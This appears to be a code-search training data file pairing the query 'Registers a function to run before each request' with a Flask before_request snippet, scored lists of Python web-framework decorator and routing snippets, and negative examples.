Allows deferment\n # of url finalization in the case that the Blueprint\n # has not yet been registered to an application, so we\n # can wait for the registration prefix\n rule = partial(self._make_url, url)\n else:\n # If we've got no Blueprint, just build a url with no prefix\n rule = self._make_url(url, None)\n # Add the url to the application or blueprint\n app.add_url_rule(rule, view_func=resource_func, **kwargs)", "def route_multiplexer(methods_to_viewfunc):\n def multiplexer():\n viewfunc = methods_to_viewfunc.get(request.method)\n if not viewfunc:\n raise Exception(\"No viewfunc found somehow?\")\n return viewfunc()\n multiplexer.methods_to_viewfunc = methods_to_viewfunc\n return multiplexer", "def view(self, request, decorator=None):\n if decorator is None:\n decorator = self.actions(self.mock_model, [\"doit\"])\n\n @decorator\n def view(req):\n response = HttpResponse()\n response.request = req\n return response\n\n return view(request)", "def get_viewfunc(self):\n # Generate some common middlewares\n if self.user_auth is not False:\n self.middlewares.append(UserAuthMiddleware(self.user_auth))\n\n if self.client_auth is not False:\n self.middlewares.append(ClientAuthMiddleware())\n\n if self.arguments:\n self.middlewares.append(ArgumentMiddleware(self.arguments))\n\n if self.paged:\n self.middlewares.append(PagingMiddleware())\n\n # Return the viewfunc, wrapped with requested middlewares\n return generate_viewfunc(self.viewfunc, self.middlewares)", "def as_view(cls):\n \n @csrf_exempt\n @slack_augment\n def view(request):\n return cls(request).dispatch()\n return view", "def route(self, path: str, **args: t.Any) -> t.Callable:\n def decorator(f: t.Callable) -> None:\n RouteMap.add_route(Route(path, f, args.get('methods', ['GET'])))\n return decorator", "def inject(self, request: BaseRequest, args_view: list, kwargs_view: dict):", "def view(cls):\n @wraps(cls)\n def wrapper(request, **kwargs):\n if hasattr(cls, 'as_view'):\n return cls.as_view()(request, **kwargs)\n obj = cls(request, **kwargs)\n handler = getattr(obj, request.method.lower(), None)\n if handler is None:\n return HttpResponseNotAllowed('%s not allowed' % request.method)\n res = obj.setup(obj.c) or handler(obj.c) or obj.render(obj.c)\n if isinstance(res, (dict, list)):\n return JsonResponse(res, safe=False)\n return res\n return wrapper", "def route(self, command):\n\n def _route(func):\n self._command_hash_views[command] = func\n\n def __route(*args, **kwargs):\n return func(*args, **kwargs)\n\n return __route\n\n return _route", "def device(view):\n def _decorator(request, *args, **kwargs):\n if not hasattr(request, \"device\"):\n m = DeviceMiddleware()\n m.process_request(request)\n return view(request, *args, **kwargs)\n\n _decorator.__doc__ = view.__doc__\n _decorator.__name__ = view.__name__\n\n return _decorator", "def setup_view(view, request, *args, **kwargs):\n\n view.request = request\n view.args = args\n view.kwargs = kwargs\n return view", "def setup_view(self, view, request, *args, **kwargs):\n view.request = request\n view.args = args\n view.kwargs = kwargs\n return view", "def req_as_decorator(req_output, *args, **kwargs):\r\n return req_output(dummy_func)(*args, **kwargs)", "def render_view(self, h, *args):\n return self.view(h)", "def decorator(view_func):\n @wraps(view_func, assigned=available_attrs(view_func))\n def _wrapped_view(request, *args, **kwargs):\n if request.auth_manager.has_privilege(privilege):\n return view_func(request, *args, **kwargs)\n else:\n raise 
InsufficientPrivilegesException(required_privileges=[privilege])\n\n return _wrapped_view", "def class_based_view_decorator(decorator):\n def _dec(cls):\n assert (isinstance(cls, type) and issubclass(cls, View)), (\n \"Only subclasses of django.views.generic.View may use this decorator.\"\n )\n _method_decorator = method_decorator(decorator)\n cls.dispatch = _method_decorator(cls.dispatch)\n return cls\n\n update_wrapper(_dec, decorator, assigned=available_attrs(decorator))\n return _dec", "def add_view(self, *args, **kwargs):\n return self._resources_manager.add_view(*args, **kwargs)", "def class_based_view(class_obj):\n def _instantiate_view_class(request, *args, **kwargs):\n return class_obj()(request, *args, **kwargs)\n return _instantiate_view_class", "def __call__(request):", "def process_view(self, request, view_func, view_args, view_kwargs):\n\n # Get undecorated function for require_login decorator\n if (isinstance(view_func, _CheckLogin)):\n view_func = view_func.view_func\n\n func_name = '.'.join((view_func.__module__, view_func.func_name))\n func_args = [','.join(view_args)]\n if func_args[0]:\n func_args.append(', ')\n func_args.append(','.join(\n [\"%s=%s\"%(k, v) for k, v in view_kwargs.items()]))\n LogDB(event_type='HR',\n info=\"Request to %s proceed by %s (%s)\"%(request.path,\n func_name, ''.join(func_args))\n ).save()\n return None", "def register(name, func, response_type, args=None, kwargs=None,\n cache_timeout=0, permission_func=grant_access):\n if not issubclass(response_type, BaseResponse):\n raise ValueError('Response type must be '\n 'one of the subclasses of '\n 'djangonumerics.responses.BaseResponse')\n if not args:\n args = []\n if not kwargs:\n kwargs = {}\n\n salt = settings.DJANGO_NUMERICS_SALT\n api_hash = hashlib.md5(str((name, salt)).encode()).hexdigest()\n endpoint = EndPoint(name=name,\n code=api_hash,\n func=func,\n args=args,\n kwargs=kwargs,\n response_type=response_type,\n cache_timeout=cache_timeout,\n permission_func=permission_func)\n if(api_hash in _CODE_ENDPOINT_MAP):\n logger.warn('Endpoint %s is already registered to numerics', name)\n else:\n _CODE_ENDPOINT_MAP[api_hash] = endpoint\n _NAME_ENDPOINT_MAP[name] = endpoint", "def api_key_required(func):\n\t@wraps(func)\n\tdef decorated_view(*args, **kwargs):\n\t\treturn func(*args,**kwargs)\n\treturn decorated_view", "def register(self):\n # self.register_route(\"GET\", self.__route, lambda req, res: self.status(req, res))\n self.register_route(\"GET\", self.__route, None, self.status)", "def with_template(arg):\n\n class TheWrapper(object):\n def __init__(self, default_template_name):\n self.default_template_name = default_template_name\n\n def __call__(self, func):\n def decorated_func(request, *args, **kwargs):\n ret = func(request, *args, **kwargs)\n if isinstance(ret, HttpResponse):\n return ret\n return TemplateResponse(request, ret.get(\n 'template_name', self.default_template_name), ret)\n\n update_wrapper(decorated_func, func)\n return decorated_func\n\n if not callable(arg):\n return TheWrapper(arg)\n else:\n app_name = re.search('([^.]+)[.]views', arg.__module__).group(1)\n default_template_name = ''.join([app_name, '/', arg.__name__, '.html'])\n return TheWrapper(default_template_name)(arg)", "def as_view(cls, *class_args, **class_kwargs):\n def view(*args, **kwargs):\n self = view.view_class(*class_args, **class_kwargs)\n return self.dispatch_request(*args, **kwargs)\n\n if cls.decorators:\n view.__module__ = cls.__module__\n for decorator in cls.decorators:\n view = 
decorator(view)\n\n view.view_class = cls\n view.__doc__ = cls.__doc__\n view.__module__ = cls.__module__\n return view", "def view_func(request, *args, **kwargs):\n method = request.GET.get('_method', request.method).upper()\n \n handler = method_table.get(method, None)\n if not handler:\n return HttpResponseNotAllowed(method_table.keys())\n\n return handler( request, *args, **kwargs)", "def register_to_blueprint(blueprint, route, methods_to_apifunc):\n methods_to_viewfunc = {}\n for method in methods_to_apifunc:\n methods_to_viewfunc[method] = methods_to_apifunc[method].get_viewfunc()\n\n if 'HEAD' not in methods_to_viewfunc and 'GET' in methods_to_viewfunc:\n methods_to_viewfunc['HEAD'] = methods_to_viewfunc['GET']\n\n blueprint.add_url_rule(\n \"/%s\" % route,\n endpoint=route,\n view_func=error_handler(route_multiplexer(methods_to_viewfunc)),\n methods=list(methods_to_viewfunc.keys()))", "def _map_intent_to_view_func(self, intent):\n if intent.name in self._intent_view_funcs:\n view_func = self._intent_view_funcs[intent.name]\n elif self._default_intent_view_func is not None:\n view_func = self._default_intent_view_func\n else:\n raise NotImplementedError('Intent \"{}\" not found and no default intent specified.'.format(intent.name))\n\n argspec = inspect.getfullargspec(view_func)\n arg_names = argspec.args\n arg_values = self._map_params_to_view_args(intent.name, arg_names)\n\n return partial(view_func, *arg_values)", "def register_create_view(self, blueprint):\n view = apply_decorators(self.create_view, self.create_decorators)\n blueprint.add_url_rule(\n self.create_rule, self.create_endpoint, view,\n methods=['GET', 'POST'])", "def get_decorated_function(self):", "def decorate(self, alias, *decorators):\n pfunc = getattr(self, alias)\n method, args, kargs = pfunc.func, pfunc.args, pfunc.keywords\n for decorator in decorators:\n method = decorator(method)\n self.register(alias, method, *args, **kargs)", "def decorator(func):\n self.subscribe(func, event, *events)\n return func", "def magic_route(self, rule, **options):\n\n def _decorator(f):\n endpoint = options.pop(\"endpoint\", f.__name__)\n if f not in self._injection_map:\n self._injection_map[f] = self._container.magic_partial(\n f, shared=self._request_singletons\n )\n self.blueprint.add_url_rule(\n rule, endpoint, self._injection_map[f], **options\n )\n return f\n\n return _decorator", "def cached_api(*args, **kwargs):\n def decorator(func):\n kwargs['request_gatekeeper'] = lambda request: not getattr(cached_view, 'never_cache', False)\n kwargs['response_gatekeeper'] = _response_gatekeeper\n\n def response_wrapper(ret):\n ret = loads(ret)\n ret['success'] = True\n ret = client_dumps(ret)\n return HttpResponse(ret, 'application/json')\n\n cache_func = cached_view(*args,\n cached_response_wrapper=response_wrapper,\n serializer=client_dumps,\n **kwargs)(func)\n cache_func.arg_spec = ArgSpec(func)\n\n return cache_func\n return decorator", "def response(status, response_def):\n def decorator(fn): # pylint: disable=missing-docstring\n meta = RouteMeta.load(fn)\n meta.set_response(status, response_def)\n meta.save()\n return fn\n return decorator", "def decorator(view_func):\n @wraps(view_func, assigned=available_attrs(view_func))\n def _wrapped_view(request, *args, **kwargs):\n dao = DataStreamDBDAO()\n query, total_resources = dao.query(account_id=request.account.id, language=request.user.language)\n if total_resources == 0 or request.GET.get('test-no-dataviews', False) == '1':\n raise AnyDatastreamRequiredException()\n return 
view_func(request, *args, **kwargs)\n\n return _wrapped_view", "def register(self, wsgi_app):\n wsgi_app.add_url_rule(\n rule=self.path,\n view_func=self.controller,\n methods=self.methods)", "def register_detail_view(self, blueprint):\n view = apply_decorators(self.detail_view, self.detail_decorators)\n blueprint.add_url_rule(self.detail_rule, self.detail_endpoint, view)", "def render_to(template_path):\n\n def decorator(func):\n def wrapper(request, *args, **kwargs):\n output = func(request, *args, **kwargs)\n if not isinstance(output, dict):\n return output\n ctx = RequestContext(request)\n return render_to_response(template_path, output,\n context_instance=ctx)\n return wrapper\n return decorator", "def register(self, *args):\n\n # Called as a decorator with no signature arguments so decorator needs\n # to use function annotations\n if len(args) == 0:\n return self._make_decorator()\n\n # If the last element is a valid @-syntax return value then we have a\n # decorator with signature arguments.\n if TypeCastSignature.is_return_element(args[-1]):\n return self._make_decorator(None, *args)\n\n # If we get here the function must have been called as a normal function\n # (not a decorator) so the last element must be the function to wrap.\n if not callable(args[-1]):\n raise ValueError(\n (\"Failed to register @-syntax function as {} is not \" \"callable\").format(args[-1])\n )\n if len(args) == 1:\n return self._make_decorator(None)(args[0])\n else:\n sigargs = args[:-1]\n return self._make_decorator(None, *sigargs)(args[-1])", "def wrapped_function(self, *args, **kwargs):\n if self.program is None:\n raise self.api_error(\n status_code=status.HTTP_404_NOT_FOUND,\n developer_message='no program exists with given key',\n error_code='program_does_not_exist'\n )\n return view_func(self, *args, **kwargs)", "def register_request_hydrator(self):\n\n # pylint: disable=missing-return-doc, missing-return-type-doc\n def decorator(func):\n self.request_hydrator_func = func\n return func\n\n return decorator", "def decorator(request, *dargs, **dkwargs):\n\n country_slug = dkwargs.get('country', '') or None\n _set_default_language_by_country(request, country_slug)\n return view_func(request, *dargs, **dkwargs)", "def view(path):\n def _decorator(func):\n @functools.wraps(func)\n def _wrapper(*args, **kwargs):\n result = func(*args, **kwargs)\n if isinstance(result, dict):\n logging.info('Return template.')\n return Template(path, **result)\n raise ValueError('Expect return a dict when using @view() decorator.')\n return _wrapper\n return _decorator", "def track_model_views(model):\n def func_wrap(django_view):\n def decorated(*args, **kwargs):\n request = args[1]\n model_id = kwargs.get('identifier')\n view_count = _increment_viewcount(model, model_id, request)\n return django_view(*args, **kwargs, view_count=view_count)\n return decorated\n return func_wrap", "def mock_as_view(view, request, *args, **kwargs):\n view.request = request\n view.args = args\n view.kwargs = kwargs\n return view", "def some(func):\n def wrapper(* args,** kwargs):\n logging.basicConfig(filename='error.log',level=logging.DEBUG)\n logging.info(request.url + \" : \" + str(request.remote_addr)+\" using function \"+func.__name__ )\n return func(* args,** kwargs)\n\n wrapper.__name__ = func.__name__ \n return wrapper", "def wsgiapp():\n def decorator(func):\n def wsgiapp_wrapper(*args):\n # we get 3 args when this is a method, two when it is\n # a function :(\n if len(args) == 3:\n environ = args[1]\n start_response = args[2]\n 
args = [args[0]]\n else:\n environ, start_response = args\n args = []\n def application(environ, start_response):\n form = request.parse_formvars(environ,\n include_get_vars=True)\n status = '200 OK'\n form['environ'] = environ\n try:\n res = func(*args, **form.mixed())\n except ValueError, ve:\n status = '500 Server Error'\n res = '<html>There was an error: %s</html>' % \\\n html_quote(ve)\n start_response(status, [('content-type', 'text/html')])\n return [res]\n app = simplecatcher(application)\n return app(environ, start_response)\n wsgiapp_wrapper.exposed = True\n return wsgiapp_wrapper\n return decorator", "def __call__(self, key):\n\n def wrapper(func):\n self._registry[key] = func\n\n return wrapper", "def RegisterModel(model_name):\n\n def decorator(f):\n MODEL_REGISTRY[model_name] = f\n return f\n\n return decorator", "def require_registered(function):\n\n @wraps(function)\n def wrap(request, *args, **kwargs):\n decorated_view_func = login_required(request)\n if not decorated_view_func.user.is_authenticated:\n return decorated_view_func(request) # return redirect to login\n\n if request.user.password_disposition != User.FULL:\n return redirect('set-password')\n else:\n return function(request, *args, **kwargs)\n\n return wrap", "def require_add(next=None, internal=None, on_install=None):\n def decorator(view):\n def newview(request, *args, **kwargs):\n next = newview.next\n internal = newview.internal\n\n try:\n fb = request.facebook\n except:\n raise ImproperlyConfigured('Make sure you have the Facebook middleware installed.')\n\n if internal is None:\n internal = request.facebook.internal\n\n if callable(next):\n next = next(request.path)\n elif isinstance(next, int):\n next = '/'.join(request.path.split('/')[next + 1:])\n elif next is None and fb.callback_path and request.path.startswith(fb.callback_path):\n next = request.path[len(fb.callback_path):]\n else:\n next = ''\n\n if not fb.check_session(request):\n if fb.added:\n if request.method == 'GET' and fb.app_name:\n return fb.redirect('%s%s' % (fb.get_app_url(), next))\n return fb.redirect(fb.get_login_url(next=next))\n else:\n return fb.redirect(fb.get_add_url(next=next))\n\n if not fb.added:\n return fb.redirect(fb.get_add_url(next=next))\n\n if 'installed' in request.GET and callable(on_install):\n on_install(request)\n\n if internal and request.method == 'GET' and fb.app_name:\n return fb.redirect('%s%s' % (fb.get_app_url(), next))\n\n return view(request, *args, **kwargs)\n newview.next = next\n newview.internal = internal\n return newview\n return decorator", "def documents_required(function=None):\n def _dec(view_func):\n def _view(request, *args, **kwargs):\n _user = request.user\n\n if _user.is_authenticated() and _user.is_worker() and\\\n (not _user.is_application_form_filled):\n return redirect('/profissional/subscription/', permanent=True)\n else:\n return view_func(request, *args, **kwargs)\n\n _view.__name__ = view_func.__name__\n _view.__dict__ = view_func.__dict__\n _view.__doc__ = view_func.__doc__\n\n return _view\n\n if function is None:\n print(\"Funciont is none\")\n return _dec\n else:\n print(\"There is some value for function\")\n return _dec(function)", "def test_register_view(dummy_request):\n from .views.default import register_view\n result = register_view(dummy_request)\n assert result == {}", "def route_params(params_def):\n def decorator(fn): # pylint: disable=missing-docstring\n meta = RouteMeta.load(fn)\n meta.route_params = params_def\n meta.save()\n return fn\n\n return decorator", "def 
rendered(func):\n @wraps(func)\n def render_function(request, *args, **kwargs):\n response = func(request, *args, **kwargs)\n if isinstance(response, HttpResponse) or isinstance(response,\n HttpResponseRedirect):\n return response\n template_name, items = response\n return render_to_response(template_name, items,\n context_instance=RequestContext(request))\n return render_function", "def anonymous_required(function=None):\n def _dec(view_func):\n def _view(request, *args, **kwargs):\n if request.user.is_authenticated():\n return redirect(reverse('core:home'))\n else:\n return view_func(request, *args, **kwargs)\n\n return _view\n\n if function is None:\n return _dec\n else:\n return _dec(function)", "def view_function(*args, **kwargs):\n\n res = {}\n status = 200\n\n try:\n from apis import apis\n url_rule = request.url_rule.rule\n apis_keys = [a[1:] for a in apis.keys()]\n url_rule_splitted = [a for a in url_rule.split(\"/\") if a in apis_keys]\n blueprint = url_rule_splitted[-1]\n blueprint = \"/\" + blueprint\n\n controller_function = apis[blueprint].functions[url_rule]\n res, status = controller_function(args, kwargs, request=request)\n\n except Exception as exc:\n # TODO: log error\n print(exc)\n\n res['error'] = True\n status = 400\n\n return res, status", "def register(self, py_type, visitor=None):\n if visitor:\n self[py_type] = visitor\n else:\n\n def decorator(f):\n self[py_type] = f\n return f\n\n return decorator", "def register(self, alias, method, *args, **kargs):\n pfunc = functools.partial(method, *args, **kargs)\n pfunc.__name__ = alias\n pfunc.__doc__ = method.__doc__\n \n try:\n # Some methods don't have any dictionary, in these cases simply \n # don't copy it.\n pfunc.__dict__.update(method.__dict__.copy())\n except AttributeError:\n pass\n \n setattr(self, alias, pfunc)", "def __call__(self, path):\n def wrapper(application):\n self.register(path, application)\n return application\n return wrapper", "def route(self, pattern: str) -> Callable:\n\n def warpper(view: Callable) -> Callable:\n self.add_route(pattern, view)\n return view\n\n return warpper", "def my_view(cls):\n return cls.__my_view", "def createViews(views):\n ...", "def decorated(*args, **kwargs):\n\n token = None\n\n if 'x-access-token' in request.headers:\n token = request.headers['x-access-token']\n\n if token is None:\n return make_response(jsonify({\n \"message\" : \"Please sign-up and login\"}), 401)\n\n try:\n data = jwt.decode(token, Config.SECRET)\n driver = data['is_driver']\n except:\n return make_response(jsonify({\n \"message\" : \"kindly provide a valid token in the header\"}), 401)\n\n if not driver:\n return make_response(jsonify({\n \"message\" : \"you are not authorized to perform this function as a non-driver user\"}), 401)\n\n return f(*args, **kwargs)", "def require_visitor(func):\n\n @wraps(func)\n def decorator(*args, **kwargs):\n if g.user:\n return redirect(url_for('site.home'))\n return func(*args, **kwargs)\n\n return decorator", "def methdispatch(func): \n dispatcher = singledispatch(func)\n def wrapper(*args, **kw):\n return dispatcher.dispatch(args[1].__class__)(*args, **kw)\n wrapper.register = dispatcher.register\n update_wrapper(wrapper, func)\n return wrapper", "def register(self):\n REGISTERED_FUNCTIONS[self.path] = self", "def register_class_views(state):\n try:\n prefixes = state.app.request_prefixes\n except AttributeError:\n prefixes = []\n state.app.request_prefixes = prefixes\n prefixes.append(state.url_prefix if state.url_prefix is not None else '')\n # Personal 
list\n personal_view = PersonalRequests.as_view('personal_requests')\n state.add_url_rule('/personal/', view_func=personal_view)\n state.add_url_rule('/personal/rss.xml', view_func=personal_view)\n state.add_url_rule('/personal/<path:filters>', view_func=personal_view)\n # Payout list\n payout_view = PayoutListing.as_view('list_approved_requests')\n payout_url_stub = '/pay/'\n state.add_url_rule(payout_url_stub, view_func=payout_view)\n state.add_url_rule(payout_url_stub + 'rss.xml', view_func=payout_view)\n state.add_url_rule(payout_url_stub + '<path:filters>',\n view_func=payout_view)\n # Other more generalized listings\n register_perm_request_listing(state, 'list_pending_requests',\n '/pending/', (PermissionType.review, PermissionType.audit),\n ActionType.pending, u'Pending Requests')\n register_perm_request_listing(state, 'list_completed_requests',\n '/completed/', PermissionType.elevated, ActionType.finalized,\n u'Completed Requests')\n # Special all listing, mainly intended for API users\n register_perm_request_listing(state, 'list_all_requests',\n '/all/', PermissionType.elevated, ActionType.statuses,\n u'All Requests')", "def register_name(self, func_name, *args):\n\n if not func_name:\n raise ValueError(\"Specified an empty function name\")\n\n # Called as a decorator with no signature arguments so decorator needs\n # to use function annotations\n if len(args) == 0:\n return self._make_decorator(func_name)\n\n # If the last element is a valid @-syntax return value then we have a\n # decorator with signature arguments.\n if TypeCastSignature.is_return_element(args[-1]):\n return self._make_decorator(func_name, *args)\n\n # If we get here the function must have been called as a normal function\n # (not a decorator) so the last element must be the function to wrap.\n if not callable(args[-1]):\n raise ValueError(\n (\"Failed to register @-syntax function as {} is not \" \"callable\").format(args[-1])\n )\n if len(args) == 1:\n return self._make_decorator(func_name)(args[0])\n else:\n sigargs = args[:-1]\n return self._make_decorator(func_name, *sigargs)(args[-1])", "def captive(f):\n\n def wrapper(self, request, *args, **kwargs):\n return captiveHandler(request) or f(self, request, *args, **kwargs)\n functools.update_wrapper(wrapper, f)\n return wrapper" ]
[ "0.7289756", "0.72566867", "0.7225575", "0.69957423", "0.6992379", "0.6944056", "0.690279", "0.68110013", "0.6685898", "0.659799", "0.64419633", "0.63916886", "0.63874936", "0.63675", "0.63599527", "0.63099504", "0.6304241", "0.62933576", "0.6256121", "0.6230036", "0.62196887", "0.6204815", "0.6196604", "0.61964613", "0.6181614", "0.6169627", "0.6158729", "0.6155529", "0.6126706", "0.6109469", "0.6054973", "0.60283697", "0.60141116", "0.6014019", "0.59787786", "0.5978534", "0.59718865", "0.59660244", "0.59659815", "0.5937459", "0.5915626", "0.5911862", "0.5849204", "0.5845305", "0.58437264", "0.5821993", "0.58218336", "0.58135116", "0.58031577", "0.58022475", "0.57901216", "0.57895404", "0.5787686", "0.57856053", "0.57832086", "0.5769144", "0.57630765", "0.57599556", "0.57580143", "0.5754415", "0.57519954", "0.57432884", "0.57378143", "0.57325685", "0.5731623", "0.57250905", "0.57220674", "0.57091063", "0.56953347", "0.5692353", "0.568764", "0.56874657", "0.56860715", "0.56813973", "0.5677955", "0.56693405", "0.56616473", "0.5660284", "0.5649965", "0.56489635", "0.56279474", "0.5626645", "0.5625374", "0.5623574", "0.562333", "0.56229526", "0.5616883", "0.56095445", "0.5601529", "0.5601329", "0.5601051", "0.55897915", "0.5589126", "0.5585774", "0.5585304", "0.5580443", "0.5576505", "0.557609", "0.55701375", "0.5562794" ]
0.6250833
19
Registers a function to run before each request.
def before_request(self, f): self.before_request_funcs.append(f) return f
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def before_request(self, func: typing.Callable):\n return self.add_hook(type_=\"pre\", hook=func)", "def before_request(self, f):\n self.before_request_handlers.append(f)\n return f", "def before_worker_start(func):\n _func_only(func)\n worker_methods_db.register_before_start(func)\n return func", "def before_request():\n pass", "def configure_before_request_funcs(app):\n @app.before_request\n def conf_set_user_cookie_id():\n return set_user_cookie_id()\n \n @app.before_request\n def check_for_maintenance():\n if config.DOWN_FOR_MAINTENANCE:\n return 'Sorry, we\\'re down momentarily for a teensey bit of maintenance!', 503\n \n @app.before_request\n def count_uniques():\n return\n statsd.set('unique_users', g.user_cookie_id)\n statsd.set('unique_ips', request.remote_addr)\n \n @app.before_request\n def set_statsd_context():\n g.statsd_context = \"%s.%s\" % (request.endpoint, request.method)\n g.total_request_timer = statsd.timer(g.statsd_context + \".response_time\")\n g.total_request_timer.start()", "def hook_client_before_request(self, event):\r\n for functor in self._hooks['client_before_request']:\r\n functor(event)", "def request_filter(self, fn):\n self.request_filters.append(fn)\n return fn", "def register_before_first(app):\n app.before_first_request_funcs.append(\n partial(admin.utils.create_root_user, app))\n app.before_first_request_funcs.append(\n partial(admin.utils.load_messenger_config, app))\n app.before_first_request_funcs.append(\n partial(admin.utils.load_site_config, app))", "def hook_server_before_exec(self, request_event):\r\n\r\n for functor in self._hooks['server_before_exec']:\r\n functor(request_event)", "def before_call(self, func: Callable[..., Any], *args: Any, **kwargs: Any) -> None:", "def process_before_request_hooks(self):\n\n hooks = []\n\n if self.resource:\n hooks.extend(self.resource.api.before_all_hooks)\n hooks.extend(self.resource.before_all_hooks)\n\n hooks.extend(self.before_all_hooks)\n hooks.extend(\n getattr(\n self,\n 'before_{method}_hooks'.format(method=self.meth),\n []\n )\n )\n\n for hook in chain(hooks):\n hook(self)", "async def _pre_call(self, _request_id: int, request: fastapi.Request, *args, **kwargs) -> None:\n return", "def register_method_before(fn, phase): # type: (Callable, str) -> None\n PackageMixinsMeta._methods_to_be_added[fn.__name__] = fn\n PackageMixinsMeta._add_method_before[phase].append(fn)", "def after_request(self, f):\n self.after_request_funcs.append(f)\n return f", "def before(self, before: Route.Decorator):\n pass", "def before_test(self, func, *args, **kwargs):\n pass", "def register_ajax_handler(self, request, function):\n if request in self.ajax_handlers:\n L.error(\"Error: request:\" + request + \" is already registered\")\n return False\n self.ajax_handlers[request] = function\n L.info(\"registered:\"+request)\n return True", "def before_request():\r\n\r\n\tinit_classes()", "def after_request_handle(self, func):\n self.after_request.append(func)\n return func", "def get_request(func):\r\n func.request = True\r\n return func", "def global_request_interceptor(self):\n # type: () -> Callable\n def wrapper(process_func):\n if not callable(process_func):\n raise SkillBuilderException(\n \"Global Request Interceptor process_func input parameter \"\n \"should be callable\")\n\n class_attributes = {\n \"process\": lambda self, handler_input: process_func(\n handler_input)\n }\n\n request_interceptor = type(\n \"RequestInterceptor{}\".format(\n process_func.__name__.title().replace(\"_\", \"\")),\n 
(AbstractRequestInterceptor,), class_attributes)\n\n self.add_global_request_interceptor(\n request_interceptor=request_interceptor())\n return process_func\n return wrapper", "def register_request_hydrator(self):\n\n # pylint: disable=missing-return-doc, missing-return-type-doc\n def decorator(func):\n self.request_hydrator_func = func\n return func\n\n return decorator", "def threaded_callback(self, func):\n\n self.th_func_map[func.__name__] = func", "def register(self):\n REGISTERED_FUNCTIONS[self.path] = self", "def bofore_response_handle(self, func):\n self.before_response.append(func)\n return func", "def after_request(self, f):\n self.after_request_handlers.append(f)\n return f", "def after_request(self, f):\n self.after_request_handlers.append(f)\n return f", "def register_request_hooks(app):\n\n @app.before_request\n def before_request():\n g.db = open_db()\n\n @app.teardown_request\n def after_request(exc):\n g.db.__exit__(type(exc), exc, None)", "def pre_runroute_callable(self, route, request):\n return None", "def api_request_globals(f):\n @wraps(f)\n def inner(*args, **kwargs):\n request.is_api_request = True\n return f(*args, **kwargs)\n return inner", "def after_request(self, func: typing.Callable):\n return self.add_hook(type_=\"post\", hook=func)", "def callWhenInitialized(func):\n if _api:\n func()\n else:\n _initCallbacks.append(func)", "def register_pre_exec_callback(action_logger):\n logging.debug(\"Adding %s to pre execution callback\", action_logger)\n __pre_exec_callbacks.append(action_logger)", "def subscribe(self, requestName: str, function: RequestFunction):\n if requestName in self.requests:\n raise KeyError(f\"Cannot subscribe function {function} to name {requestName} because \"\n f\"the name is already used\")\n self.requests[requestName] = function", "def register():\n PLUGINS = dict()\n def decorator(func):\n @functools.wraps(func)\n def wrapper(self, *args, **kwargs):\n value = func(*args, **kwargs)\n PLUGINS[func.__name__] = func\n return value\n return wrapper\n return decorator", "def before_call(\n self, cb: CircuitBreaker, func: Callable[..., T], *args: Any, **kwargs: Any\n ) -> None:", "def register(self, funcs):\n for name, func in funcs.items():\n self.functions[name] = func", "def dajaxice_register(*dargs, **dkwargs):\r\n\r\n if len(dargs) and not dkwargs:\r\n function = dargs[0]\r\n dajaxice_functions.register(function)\r\n return function\r\n\r\n def decorator(function):\r\n @functools.wraps(function)\r\n def wrapper(request, *args, **kwargs):\r\n return function(request, *args, **kwargs)\r\n dajaxice_functions.register(function, *dargs, **dkwargs)\r\n return wrapper\r\n return decorator", "def on_pre_execution(**kwargs):\n logging.debug(\"Calling callbacks: %s\", __pre_exec_callbacks)\n for callback in __pre_exec_callbacks:\n try:\n callback(**kwargs)\n except Exception:\n logging.exception(\"Failed on pre-execution callback using %s\", callback)", "def onRegister(setup_state):\n\tblueprint = setup_state.blueprint\n\t#if setup_state.options.get('auth') == True:\n\tif setup_state.url_prefix.startswith('/ext/'): #not really used right now\n\t\t#inside here, 'route' works but not 'before_request'\n\t\t#maybe use to register authentication-specific routes?\n\t\tprint(\"Authenticated API on {}\".format(setup_state.url_prefix))", "def defer_lowering(self, key, lower_fn):\n with self._lock:\n if key in self._no_defer:\n # Key is marked as no defer, register lowering now\n lower_fn()\n else:\n # Defer\n self._deferred[key].append(lower_fn)", "def 
preprocess_func(cls, func):\n pass", "def before(hook_name, methods, kwargs):\n for hookimpl in methods:\n self._plugin2calls[hookimpl.plugin].add(hook_name)", "def after_worker_start(func):\n _func_only(func)\n worker_methods_db.register_after_start(func)\n return func", "def _pre_dispatch(self, request, *args, **kwargs):\n pass", "def register(func):\n PLUGINS[func.__name__] = func\n return func", "def add_preprocess_callback(self, name, func, *args, **kwargs):\n\n self.preprocess[name] = (func, args, kwargs)", "def register_function(self, function, name=None):\n if name is None:\n name = function.__name__\n self.funcs[name] = function", "def preprocess_func(cls, func):\n return func", "def add_function(self, function):\n self.functions.append(function)", "def add_function(self, function):\n self.functions.append(function)", "def addFunction(self, func):\n self.__functions.append(func)", "def rpc_immediate(func):\n decorator = rpc_call(func)\n decorator.rpc_immediate = True\n return decorator", "def includeme(config):\n config.add_subscriber(add_renderer_globals, BeforeRender)\n config.add_subscriber(add_localizer, NewRequest)\n config.add_subscriber(add_csrf_validation, NewRequest)\n config.add_subscriber(add_resources, NewRequest)", "def register(name, func):\n WebSocketRouter.funcmap[name] = func", "def before_request():\n request._prometheus_metrics_request_start_time = time.time()", "def init_func(fn):\n fn.__has_run__ = False\n @functools.wraps(fn)\n def wrapper_fn(*args, **kwargs):\n if fn.__has_run__:\n cui.message('Warning: executing init_func %s more than once.' % fn)\n\n result = fn(*args, **kwargs)\n fn.__has_run__ = True\n return result\n\n Core.__init_functions__.append(wrapper_fn)\n return wrapper_fn", "def on_start(self):\n\n def decorator(coro):\n self._hooks.append((\"start\", coro))\n return coro\n\n return decorator", "def before_request():\n request._prometheus_metrics_request_start_time = default_timer()", "def inject_header(f):\n def oncall(*args, **kwargs):\n rv = f(*args, **kwargs)\n if rv.status_code == 200:\n rv.headers['X-Pingback'] = url_for('services/pingback',\n _external=True)\n return rv\n oncall.__name__ = f.__name__\n oncall.__module__ = f.__module__\n oncall.__doc__ = f.__doc__\n return oncall", "def register_callback(self, func):\n self.callback = func", "def rpc_deferred(func):\n decorator = rpc_call(func)\n decorator.rpc_deferred = True\n return decorator", "def notifyPreInsertion(self, function, **kwargs):\n self._sig_preinsertion.subscribe(function, **kwargs)", "def register_step(step_function: StepFunction) -> None:\n global _step_function\n _step_function = step_function", "def on_loaded(self, func):\n self._on_loaded_funcs.append(func)", "def enable_audit_logging(f):\n\n @wraps(f)\n def wrapper(*args, **kwargs):\n def create_audit_log_for_request_decorator(response):\n return create_audit_log_for_request(response)\n\n if is_audit_enabled():\n # we can't add the `after_this_request` and\n # `create_audit_log_for_request_decorator` decorators to the\n # functions directly, because 